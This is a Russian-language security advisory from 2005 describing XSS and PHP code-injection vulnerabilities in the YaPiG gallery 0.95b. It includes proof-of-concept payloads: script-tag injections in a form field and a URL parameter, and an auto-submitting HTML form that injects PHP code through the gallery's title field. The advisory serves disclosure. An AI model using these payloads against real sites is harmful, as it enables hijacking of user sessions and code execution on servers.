Security Lab

Межсайтовый скриптинг и PHP-инклюдинг в Yapig

Дата публикации:14.10.2005
Всего просмотров:2290
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Внедрение в сессию пользователя
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: YaPiG 0.x
Уязвимые версии: Yapig 0.95b и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей, а также выполнить произвольный PHP сценарий на системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в поле Website формы Homepage. Пример:

"><script>alert('hi')</script>

2. Уязвимость существует при обработке параметра img_size в сценарии view.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости должна быть включена опция register_globals Пример:

http://your-server/path-to-yapig/view.php?gid=1&phid=1&img_size=><script>alert('hi')</script>

3. Удаленный пользователь может c помощью специально сформированной формы внедрить и выполнить произвольный PHP сценарий на целевой системе. Для удачной эксплуатации уязвимости требуется участие пользователя с административными привилегиями в приложении. Пример:

<form method="post" action="http://your-server/path-to-yapig/yapig095b/modify_gallery.php?action=mod_info&amp;gid=1">
<input value='TestGallery"; echo "evil' name="title" type="text">
<input value="TestAuthor" name="author" type="text">
<input value="TestDate" name="date" type="text">
<input value="" name="dir" type="text">
<input value="TestDescription" name="desc" type="text">
<input type="submit">
</form>

<script type="text/javascript">
document.forms[0].submit();
</script>

URL производителя: yapig.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: Yapig: XSS / Code Injection Vulnerability